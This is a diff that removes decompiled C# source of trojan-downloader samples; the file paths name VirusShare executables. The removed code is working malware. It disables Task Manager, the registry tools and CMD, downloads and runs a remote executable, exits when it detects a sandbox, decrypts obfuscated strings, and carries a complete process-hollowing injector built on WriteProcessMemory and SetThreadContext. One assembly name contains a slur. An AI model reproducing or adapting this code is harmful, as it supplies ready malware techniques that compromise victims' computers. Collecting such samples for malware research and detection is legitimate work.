File.Copy(Process.GetCurrentProcess().MainModule.FileName, destFileName, true);
|
|
||||||
checked { ++num; }
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[27]))
|
|
||||||
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
|
|
||||||
if (Conversions.ToBoolean(strArray2[28]))
|
|
||||||
{
|
|
||||||
MyProject.Computer.Network.DownloadFile(strArray2[33], Path.GetTempPath() + "msconfigdl.exe");
|
|
||||||
Process.Start(Path.GetTempPath() + "msconfigdl.exe");
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[29]))
|
|
||||||
Process.Start(strArray2[34]);
|
|
||||||
if (Conversions.ToBoolean(strArray2[30]))
|
|
||||||
{
|
|
||||||
StreamWriter streamWriter = new StreamWriter(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "\u0002|\u0018\u0011((7.17\u001A\u0012? 5#)us\u001A73/2#35\u000F$2'\u001A)) 55"));
|
|
||||||
string str = Conversions.ToString(Operators.CompareString("\n" + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "ptshqhcowd161}7/6322<5'(h"), ")", false) > 0);
|
|
||||||
streamWriter.Write(str);
|
|
||||||
streamWriter.Close();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[31]))
|
|
||||||
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
|
|
||||||
if (!Conversions.ToBoolean(strArray2[32]))
|
|
||||||
return;
|
|
||||||
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string UWLUFUDALKLWDKKSWDKFWOIKK591415(
|
|
||||||
string UWLUFUDALKLWDKKSWDKFWOIKKas,
|
|
||||||
string UWLUFUDALKLWDKKSWDKFWOIKKdaze)
|
|
||||||
{
|
|
||||||
long num1 = (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKdaze);
|
|
||||||
long Start = 1;
|
|
||||||
string str;
|
|
||||||
while (Start <= num1)
|
|
||||||
{
|
|
||||||
int num2 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKdaze, checked ((int) Start), 1));
|
|
||||||
int num3 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKas, checked ((int) (unchecked (Start % (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKas)) + 1L)), 1));
|
|
||||||
str += Conversions.ToString(Strings.Chr(num2 ^ num3));
|
|
||||||
checked { ++Start; }
|
|
||||||
}
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void UWLUFUDALKLWDKKSWDKFWOIKK16(string UWLUFUDALKLWDKKSWDKFWOIKK86)
|
|
||||||
{
|
|
||||||
Process[] processes = Process.GetProcesses();
|
|
||||||
int index = 0;
|
|
||||||
while (index < processes.Length)
|
|
||||||
{
|
|
||||||
Process process = processes[index];
|
|
||||||
if (process.ProcessName.Contains(UWLUFUDALKLWDKKSWDKFWOIKK86))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
process.Kill();
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
ProjectData.SetProjectError(ex);
|
|
||||||
ProjectData.ClearProjectError();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void UWLUFUDALKLWDKKSWDKFWOIKK17()
|
|
||||||
{
|
|
||||||
if (Process.GetProcessesByName("SbieSvc").Length < 1)
|
|
||||||
return;
|
|
||||||
Environment.Exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void UWLUFUDALKLWDKKSWDKFWOIKK18()
|
|
||||||
{
|
|
||||||
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
|
|
||||||
return;
|
|
||||||
Environment.Exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void UWLUFUDALKLWDKKSWDKFWOIKK26(
|
|
||||||
string UWLUFUDALKLWDKKSWDKFWOIKK87,
|
|
||||||
string UWLUFUDALKLWDKKSWDKFWOIKK88)
|
|
||||||
{
|
|
||||||
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
|
|
||||||
ListBox listBox = new ListBox();
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string[] directories = Directory.GetDirectories(UWLUFUDALKLWDKKSWDKFWOIKK87);
|
|
||||||
int index1 = 0;
|
|
||||||
while (index1 < directories.Length)
|
|
||||||
{
|
|
||||||
string str1 = directories[index1];
|
|
||||||
string[] files = Directory.GetFiles(FileSystem.Dir(), "*.zip");
|
|
||||||
int index2 = 0;
|
|
||||||
while (index2 < files.Length)
|
|
||||||
{
|
|
||||||
string str2 = files[index2];
|
|
||||||
listBox.Items.Add((object) str2);
|
|
||||||
checked { ++index2; }
|
|
||||||
}
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26(FileSystem.Dir(), UWLUFUDALKLWDKKSWDKFWOIKK88);
|
|
||||||
checked { ++index1; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
ProjectData.SetProjectError(ex);
|
|
||||||
ProjectData.ClearProjectError();
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (object obj in listBox.Items)
|
|
||||||
{
|
|
||||||
string str = Conversions.ToString(obj);
|
|
||||||
Process.Start(new ProcessStartInfo()
|
|
||||||
{
|
|
||||||
FileName = folderPath + "\\7-Zipz\\7z.exe",
|
|
||||||
Arguments = " a " + str.ToString() + " " + UWLUFUDALKLWDKKSWDKFWOIKK88,
|
|
||||||
WindowStyle = ProcessWindowStyle.Hidden
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator enumerator;
|
|
||||||
if (enumerator is IDisposable)
|
|
||||||
(enumerator as IDisposable).Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,459 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: rp
|
|
||||||
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Text;
|
|
||||||
using System.Threading;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
[StandardModule]
|
|
||||||
public sealed class rp
|
|
||||||
{
|
|
||||||
public const long PAGE_NOCACHE = 512;
|
|
||||||
public const long PAGE_EXECUTE_READWRITE = 64;
|
|
||||||
public const long PAGE_EXECUTE_WRITECOPY = 128;
|
|
||||||
public const long PAGE_EXECUTE_READ = 32;
|
|
||||||
public const long PAGE_EXECUTE = 16;
|
|
||||||
public const long PAGE_WRITECOPY = 8;
|
|
||||||
public const long PAGE_NOACCESS = 1;
|
|
||||||
public const long PAGE_READWRITE = 4;
|
|
||||||
public const uint PAGE_READONLY = 2;
|
|
||||||
|
|
||||||
public static string eqwrsdafasdf(
|
|
||||||
string asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf,
|
|
||||||
string asiodufosdafioweurioioasdkljfklasdjflk)
|
|
||||||
{
|
|
||||||
int index1 = 0;
|
|
||||||
int index2 = 0;
|
|
||||||
StringBuilder stringBuilder = new StringBuilder();
|
|
||||||
string empty = string.Empty;
|
|
||||||
int[] numArray1 = new int[257];
|
|
||||||
int[] numArray2 = new int[257];
|
|
||||||
int length = asiodufosdafioweurioioasdkljfklasdjflk.Length;
|
|
||||||
int location1 = 0;
|
|
||||||
while (location1 <= (int) byte.MaxValue)
|
|
||||||
{
|
|
||||||
char String = asiodufosdafioweurioioasdkljfklasdjflk.Substring(location1 % length, 1).ToCharArray()[0];
|
|
||||||
numArray2[location1] = Strings.Asc(String);
|
|
||||||
numArray1[location1] = location1;
|
|
||||||
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
|
|
||||||
}
|
|
||||||
int index3 = 0;
|
|
||||||
int location2 = 0;
|
|
||||||
while (location2 <= (int) byte.MaxValue)
|
|
||||||
{
|
|
||||||
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
|
|
||||||
int num = numArray1[location2];
|
|
||||||
numArray1[location2] = numArray1[index3];
|
|
||||||
numArray1[index3] = num;
|
|
||||||
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
|
|
||||||
}
|
|
||||||
location1 = 1;
|
|
||||||
while (location1 <= asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf.Length)
|
|
||||||
{
|
|
||||||
index1 = checked (index1 + 1) % 256;
|
|
||||||
index2 = checked (index2 + numArray1[index1]) % 256;
|
|
||||||
int num1 = numArray1[index1];
|
|
||||||
numArray1[index1] = numArray1[index2];
|
|
||||||
numArray1[index2] = num1;
|
|
||||||
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
|
|
||||||
int CharCode = Strings.Asc(asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf.Substring(checked (location1 - 1), 1).ToCharArray()[0]) ^ num2;
|
|
||||||
stringBuilder.Append(Strings.Chr(CharCode));
|
|
||||||
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
|
|
||||||
}
|
|
||||||
string str = stringBuilder.ToString();
|
|
||||||
stringBuilder.Length = 0;
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void inject(byte[] data)
|
|
||||||
{
|
|
||||||
if (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86"))
|
|
||||||
rp.strangething(data, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe");
|
|
||||||
else
|
|
||||||
rp.strangething(data, Application.ExecutablePath);
|
|
||||||
}
|
|
||||||
|
|
||||||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
||||||
|
|
||||||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
||||||
|
|
||||||
public static T CreateAPI<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(rp.GetProcAddress(rp.LoadLibraryA(ref name), ref method), typeof (T));
|
|
||||||
|
|
||||||
public static void strangething(byte[] data, string target)
|
|
||||||
{
|
|
||||||
rp.CreateProcessA api1 = rp.CreateAPI<rp.CreateProcessA>("kernel32", "CreateProcessA");
|
|
||||||
rp.WriteProcessMemory api2 = rp.CreateAPI<rp.WriteProcessMemory>("kernel32", "WriteProcessMemory");
|
|
||||||
rp.ReadProcessMemory api3 = rp.CreateAPI<rp.ReadProcessMemory>("kernel32", "ReadProcessMemory");
|
|
||||||
rp.VirtualAllocEx api4 = rp.CreateAPI<rp.VirtualAllocEx>("kernel32", "VirtualAllocEx");
|
|
||||||
rp.ZwUnmapViewOfSection api5 = rp.CreateAPI<rp.ZwUnmapViewOfSection>("ntdll", "ZwUnmapViewOfSection");
|
|
||||||
rp.ResumeThread api6 = rp.CreateAPI<rp.ResumeThread>("kernel32", "ResumeThread");
|
|
||||||
rp.GetThreadContext api7 = rp.CreateAPI<rp.GetThreadContext>("kernel32", "GetThreadContext");
|
|
||||||
rp.SetThreadContext api8 = rp.CreateAPI<rp.SetThreadContext>("kernel32", "SetThreadContext");
|
|
||||||
rp.H.Context context = new rp.H.Context();
|
|
||||||
rp.H.Process_Information info = new rp.H.Process_Information();
|
|
||||||
rp.H.Startup_Information startup = new rp.H.Startup_Information();
|
|
||||||
rp.H.Security_Flags process1 = new rp.H.Security_Flags();
|
|
||||||
rp.H.Security_Flags thread = new rp.H.Security_Flags();
|
|
||||||
object Instance1 = (object) GCHandle.Alloc((object) data, GCHandleType.Pinned);
|
|
||||||
int integer = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance1, (System.Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (System.Type) null, "ToInt32", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
|
|
||||||
rp.H.DOS_Header dosHeader1 = new rp.H.DOS_Header();
|
|
||||||
System.Type Type = typeof (Marshal);
|
|
||||||
object[] objArray1 = new object[2];
|
|
||||||
object[] objArray2 = objArray1;
|
|
||||||
object Instance2 = Instance1;
|
|
||||||
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance2, (System.Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
|
|
||||||
objArray2[0] = objectValue;
|
|
||||||
objArray1[1] = (object) dosHeader1.GetType();
|
|
||||||
object[] objArray3 = objArray1;
|
|
||||||
object[] Arguments = objArray3;
|
|
||||||
bool[] flagArray = new bool[2]{ true, false };
|
|
||||||
bool[] CopyBack = flagArray;
|
|
||||||
object obj = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (System.Type[]) null, CopyBack);
|
|
||||||
if (flagArray[0])
|
|
||||||
NewLateBinding.LateSetComplex(Instance2, (System.Type) null, "AddrOfPinnedObject", new object[1]
|
|
||||||
{
|
|
||||||
RuntimeHelpers.GetObjectValue(objArray3[0])
|
|
||||||
}, (string[]) null, (System.Type[]) null, true, false);
|
|
||||||
rp.H.DOS_Header dosHeader2;
|
|
||||||
rp.H.DOS_Header dosHeader3 = obj != null ? (rp.H.DOS_Header) obj : dosHeader2;
|
|
||||||
NewLateBinding.LateCall(Instance1, (System.Type) null, "Free", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
|
|
||||||
IntPtr system;
|
|
||||||
if (-(api1((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
|
|
||||||
return;
|
|
||||||
rp.H.NT_Headers ntHeaders1 = new rp.H.NT_Headers();
|
|
||||||
object structure1 = Marshal.PtrToStructure(new IntPtr(checked (integer + dosHeader3.Address)), ntHeaders1.GetType());
|
|
||||||
rp.H.NT_Headers ntHeaders2;
|
|
||||||
rp.H.NT_Headers ntHeaders3 = structure1 != null ? (rp.H.NT_Headers) structure1 : ntHeaders2;
|
|
||||||
startup.CB = Strings.Len((object) startup);
|
|
||||||
context.Flags = 65539U;
|
|
||||||
if (ntHeaders3.Signature != 17744U | dosHeader3.Magic != (ushort) 23117)
|
|
||||||
return;
|
|
||||||
int num1 = api7(info.Thread, ref context) ? 1 : 0;
|
|
||||||
rp.ReadProcessMemory readProcessMemory = api3;
|
|
||||||
IntPtr process2 = info.Process;
|
|
||||||
IntPtr address1 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|
||||||
long num2;
|
|
||||||
IntPtr ptr = (IntPtr) num2;
|
|
||||||
ref IntPtr local1 = ref ptr;
|
|
||||||
IntPtr size1 = (IntPtr) 4;
|
|
||||||
int num3 = 0;
|
|
||||||
ref int local2 = ref num3;
|
|
||||||
int num4 = readProcessMemory(process2, address1, ref local1, size1, ref local2);
|
|
||||||
long address2 = (long) ptr;
|
|
||||||
long num5 = api5(info.Process, (IntPtr) address2);
|
|
||||||
uint num6 = checked ((uint) (int) api4(info.Process, (IntPtr) (long) ntHeaders3.Optional.Image, ntHeaders3.Optional.SImage, 12288U, 4U));
|
|
||||||
if (num6 == 0U)
|
|
||||||
return;
|
|
||||||
rp.WriteProcessMemory writeProcessMemory1 = api2;
|
|
||||||
IntPtr process3 = info.Process;
|
|
||||||
IntPtr address3 = (IntPtr) (long) num6;
|
|
||||||
byte[] buffer1 = data;
|
|
||||||
IntPtr sheaders = (IntPtr) (long) ntHeaders3.Optional.SHeaders;
|
|
||||||
uint num7;
|
|
||||||
int num8 = checked ((int) num7);
|
|
||||||
ref int local3 = ref num8;
|
|
||||||
int num9 = writeProcessMemory1(process3, address3, buffer1, sheaders, out local3) ? 1 : 0;
|
|
||||||
uint num10 = checked ((uint) num8);
|
|
||||||
long num11 = (long) checked (dosHeader3.Address + 248);
|
|
||||||
int num12 = checked ((int) ntHeaders3.File.Sections - 1);
|
|
||||||
int num13 = 0;
|
|
||||||
while (num13 <= num12)
|
|
||||||
{
|
|
||||||
ptr = new IntPtr(checked ((long) integer + num11 + (long) (num13 * 40)));
|
|
||||||
rp.H.Section_Header sectionHeader1;
|
|
||||||
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
|
|
||||||
rp.H.Section_Header sectionHeader2;
|
|
||||||
sectionHeader1 = structure2 != null ? (rp.H.Section_Header) structure2 : sectionHeader2;
|
|
||||||
byte[] numArray = new byte[checked ((int) sectionHeader1.Size + 1)];
|
|
||||||
int num14 = checked ((int) ((long) sectionHeader1.Size - 1L));
|
|
||||||
int index = 0;
|
|
||||||
while (index <= num14)
|
|
||||||
{
|
|
||||||
numArray[index] = data[checked ((int) ((long) sectionHeader1.Pointer + (long) index))];
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
rp.WriteProcessMemory writeProcessMemory2 = api2;
|
|
||||||
IntPtr process4 = info.Process;
|
|
||||||
IntPtr address4 = (IntPtr) (long) checked (num6 + sectionHeader1.Address);
|
|
||||||
byte[] buffer2 = numArray;
|
|
||||||
IntPtr size2 = (IntPtr) (long) sectionHeader1.Size;
|
|
||||||
num8 = checked ((int) num10);
|
|
||||||
ref int local4 = ref num8;
|
|
||||||
int num15 = writeProcessMemory2(process4, address4, buffer2, size2, out local4) ? 1 : 0;
|
|
||||||
num10 = checked ((uint) num8);
|
|
||||||
checked { ++num13; }
|
|
||||||
}
|
|
||||||
object bytes = (object) BitConverter.GetBytes(num6);
|
|
||||||
rp.WriteProcessMemory writeProcessMemory3 = api2;
|
|
||||||
IntPtr process5 = info.Process;
|
|
||||||
IntPtr address5 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|
||||||
byte[] buffer3 = (byte[]) bytes;
|
|
||||||
IntPtr size3 = (IntPtr) 4;
|
|
||||||
num8 = checked ((int) num10);
|
|
||||||
ref int local5 = ref num8;
|
|
||||||
int num16 = writeProcessMemory3(process5, address5, buffer3, size3, out local5) ? 1 : 0;
|
|
||||||
num7 = checked ((uint) num8);
|
|
||||||
context.Eax = checked (num6 + ntHeaders3.Optional.Address);
|
|
||||||
int num17 = api8(info.Thread, ref context) ? 1 : 0;
|
|
||||||
int num18 = (int) api6(info.Thread);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (rp.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift))));
|
|
||||||
|
|
||||||
private static double vbLongToULong(long Value) => Value >= 0L ? (double) Value : (double) Value + 4294967296.0;
|
|
||||||
|
|
||||||
private static long Protect(long characteristics) => Conversions.ToLong(new object[8]
|
|
||||||
{
|
|
||||||
(object) 1L,
|
|
||||||
(object) 16L,
|
|
||||||
(object) 2U,
|
|
||||||
(object) 32L,
|
|
||||||
(object) 4L,
|
|
||||||
(object) 64L,
|
|
||||||
(object) 4L,
|
|
||||||
(object) 64L
|
|
||||||
}[checked ((int) rp.RShift(characteristics, 29L))]);
|
|
||||||
|
|
||||||
public delegate bool CreateProcessA(
|
|
||||||
string name,
|
|
||||||
string command,
|
|
||||||
ref rp.H.Security_Flags process,
|
|
||||||
ref rp.H.Security_Flags thread,
|
|
||||||
bool inherit,
|
|
||||||
uint flags,
|
|
||||||
IntPtr system,
|
|
||||||
string current,
|
|
||||||
[In] ref rp.H.Startup_Information startup,
|
|
||||||
out rp.H.Process_Information info);
|
|
||||||
|
|
||||||
public delegate bool WriteProcessMemory(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
byte[] buffer,
|
|
||||||
IntPtr size,
|
|
||||||
out int written);
|
|
||||||
|
|
||||||
public delegate int ReadProcessMemory(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
ref IntPtr buffer,
|
|
||||||
IntPtr size,
|
|
||||||
ref int read);
|
|
||||||
|
|
||||||
public delegate IntPtr VirtualAllocEx(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
uint size,
|
|
||||||
uint type,
|
|
||||||
uint protect);
|
|
||||||
|
|
||||||
public delegate long ZwUnmapViewOfSection(IntPtr process, IntPtr address);
|
|
||||||
|
|
||||||
public delegate uint ResumeThread(IntPtr thread);
|
|
||||||
|
|
||||||
public delegate bool GetThreadContext(IntPtr thread, ref rp.H.Context context);
|
|
||||||
|
|
||||||
public delegate bool SetThreadContext(IntPtr thread, ref rp.H.Context context);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public class H
|
|
||||||
{
|
|
||||||
public struct Context
|
|
||||||
{
|
|
||||||
public uint Flags;
|
|
||||||
public uint D0;
|
|
||||||
public uint D1;
|
|
||||||
public uint D2;
|
|
||||||
public uint D3;
|
|
||||||
public uint D6;
|
|
||||||
public uint D7;
|
|
||||||
public rp.H.Save Save;
|
|
||||||
public uint SG;
|
|
||||||
public uint SF;
|
|
||||||
public uint SE;
|
|
||||||
public uint SD;
|
|
||||||
public uint Edi;
|
|
||||||
public uint Esi;
|
|
||||||
public uint Ebx;
|
|
||||||
public uint Edx;
|
|
||||||
public uint Ecx;
|
|
||||||
public uint Eax;
|
|
||||||
public uint Ebp;
|
|
||||||
public uint Eip;
|
|
||||||
public uint SC;
|
|
||||||
public uint EFlags;
|
|
||||||
public uint Esp;
|
|
||||||
public uint SS;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|
||||||
public byte[] Registers;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Save
|
|
||||||
{
|
|
||||||
public uint Control;
|
|
||||||
public uint Status;
|
|
||||||
public uint Tag;
|
|
||||||
public uint ErrorO;
|
|
||||||
public uint ErrorS;
|
|
||||||
public uint DataO;
|
|
||||||
public uint DataS;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|
||||||
public byte[] RegisterArea;
|
|
||||||
public uint State;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Misc
|
|
||||||
{
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Section_Header
|
|
||||||
{
|
|
||||||
public byte Name;
|
|
||||||
public rp.H.Misc Misc;
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
public uint Pointer;
|
|
||||||
public uint PRelocations;
|
|
||||||
public uint PLines;
|
|
||||||
public uint NRelocations;
|
|
||||||
public uint NLines;
|
|
||||||
public uint Flags;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Process_Information
|
|
||||||
{
|
|
||||||
public IntPtr Process;
|
|
||||||
public IntPtr Thread;
|
|
||||||
public int ProcessId;
|
|
||||||
public int ThreadId;
|
|
||||||
}
|
|
||||||
|
|
||||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|
||||||
public struct Startup_Information
|
|
||||||
{
|
|
||||||
public int CB;
|
|
||||||
public string ReservedA;
|
|
||||||
public string Desktop;
|
|
||||||
public string Title;
|
|
||||||
public int X;
|
|
||||||
public int Y;
|
|
||||||
public int XSize;
|
|
||||||
public int YSize;
|
|
||||||
public int XCount;
|
|
||||||
public int YCount;
|
|
||||||
public int Fill;
|
|
||||||
public int Flags;
|
|
||||||
public short ShowWindow;
|
|
||||||
public short ReservedB;
|
|
||||||
public int ReservedC;
|
|
||||||
public int Input;
|
|
||||||
public int Output;
|
|
||||||
public int Error;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Security_Flags
|
|
||||||
{
|
|
||||||
public int Length;
|
|
||||||
public IntPtr Descriptor;
|
|
||||||
public int Inherit;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct DOS_Header
|
|
||||||
{
|
|
||||||
public ushort Magic;
|
|
||||||
public ushort Last;
|
|
||||||
public ushort Pages;
|
|
||||||
public ushort Relocations;
|
|
||||||
public ushort Size;
|
|
||||||
public ushort Minimum;
|
|
||||||
public ushort Maximum;
|
|
||||||
public ushort SS;
|
|
||||||
public ushort SP;
|
|
||||||
public ushort Checksum;
|
|
||||||
public ushort IP;
|
|
||||||
public ushort CS;
|
|
||||||
public ushort Table;
|
|
||||||
public ushort Overlay;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|
||||||
public ushort[] ReservedA;
|
|
||||||
public ushort ID;
|
|
||||||
public ushort Info;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|
||||||
public ushort[] ReservedB;
|
|
||||||
public int Address;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct NT_Headers
|
|
||||||
{
|
|
||||||
public uint Signature;
|
|
||||||
public rp.H.File_Header File;
|
|
||||||
public rp.H.Optional_Headers Optional;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct File_Header
|
|
||||||
{
|
|
||||||
public ushort Machine;
|
|
||||||
public ushort Sections;
|
|
||||||
public uint Stamp;
|
|
||||||
public uint Table;
|
|
||||||
public uint Symbols;
|
|
||||||
public ushort Size;
|
|
||||||
public ushort Flags;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Optional_Headers
|
|
||||||
{
|
|
||||||
public ushort Magic;
|
|
||||||
public byte Major;
|
|
||||||
public byte Minor;
|
|
||||||
public uint SCode;
|
|
||||||
public uint IData;
|
|
||||||
public uint UData;
|
|
||||||
public uint Address;
|
|
||||||
public uint Code;
|
|
||||||
public uint Data;
|
|
||||||
public uint Image;
|
|
||||||
public uint SectionA;
|
|
||||||
public uint FileA;
|
|
||||||
public ushort MajorO;
|
|
||||||
public ushort MinorO;
|
|
||||||
public ushort MajorI;
|
|
||||||
public ushort MinorI;
|
|
||||||
public ushort MajorS;
|
|
||||||
public ushort MinorS;
|
|
||||||
public uint Version;
|
|
||||||
public uint SImage;
|
|
||||||
public uint SHeaders;
|
|
||||||
public uint Checksum;
|
|
||||||
public ushort Subsystem;
|
|
||||||
public ushort Flags;
|
|
||||||
public uint SSReserve;
|
|
||||||
public uint SSCommit;
|
|
||||||
public uint SHReserve;
|
|
||||||
public uint SHCommit;
|
|
||||||
public uint LFlags;
|
|
||||||
public uint Count;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|
||||||
public rp.H.Data_Directory[] DataDirectory;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct Data_Directory
|
|
||||||
{
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
Binary file not shown.
@ -1,3 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyVersion("0.0.0.0")]
|
|
@ -1,324 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97
|
|
||||||
// Assembly: facebookcrp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 36230979-21AB-4175-8299-493F28407E94
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using My;
|
|
||||||
using System;
|
|
||||||
using System.Collections;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Text;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
[StandardModule]
|
|
||||||
